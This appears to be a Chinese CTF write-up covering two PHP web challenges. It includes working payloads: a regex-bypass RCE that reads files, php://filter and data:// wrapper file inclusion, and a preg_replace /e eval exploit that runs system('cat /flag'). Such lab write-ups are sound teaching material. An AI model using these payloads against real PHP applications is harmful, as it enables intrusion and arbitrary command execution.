[GXYCTF2019]禁止套娃1

启动靶机，右键查看源码，burp抓包，发现都没什么收获。拿御剑扫一下。

感觉是有git源码泄露，用GitHack扫一下

?拿到一个叫index.php的文件，打开看一下源码

?代码审计，思路就是通过绕过正则来实现RCE，饶了几次，还是自己太菜，看了看大佬的wp

构造payload：

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

拿到flag? ? ? ? ? ? ? ? ? ??flag{1589218c-0125-4571-b74d-6546fd8f8901}

[BJDCTF2020]ZJCTF，不过如此1

启动靶机

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

代码审计，应该是文件包含类题目，GET传了text和file两个参数，text需要用到php的date伪协议，file通过php的filter伪协议，构造payload。因为题目提升了next.php所以先看一下next.php

text=data://text/plain,I%20have%20a%20dream
file=php://filter/convert.base64-encode/resource=next.php

构造payload：

?text=data://text/plain,I%20have%20a%20dream&file=php://filter/convert.base64-encode/resource=next.php

复制到base64在线解码，

?拿到next.php的源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

?看到最后一行，应该是要用到命令执行，构造payload

/next.php?\S*=${getFlag()}&cmd=system("cat%20/flag");

?拿到flag? ? ? ? ??flag{95082b97-be1a-40d5-93a5-f64adc68fdbf}

PHP知识库最新文章

Laravel 下实现 Google 2fa 验证

UUCTF WP

DASCTF10月 web

XAMPP任意命令执行提升权限漏洞（CVE-2020-

[GYCTF2020]Easyphp

iwebsec靶场代码执行关卡通关笔记

多个线程同步执行，多个线程依次执行，多个

php 没事记录下常用方法 (TP5.1)

php之jwt

2021-09-18

加:2022-09-25 23:04:30 更:2022-09-25 23:04:41

360图书馆购物三丰科技阅读网日历万年历 2025年12日历

-2025/12/2 20:40:15-

图片自动播放器
↓图片自动播放器↓

TxT小说阅读器
↓语音阅读,小说下载,古典文学↓

一键清除垃圾
↓轻轻一点,清除系统垃圾↓

图片批量下载器
↓批量下载图片,美女图库↓

网站联系: qq:121756557 email:121756557@qq.com IT数码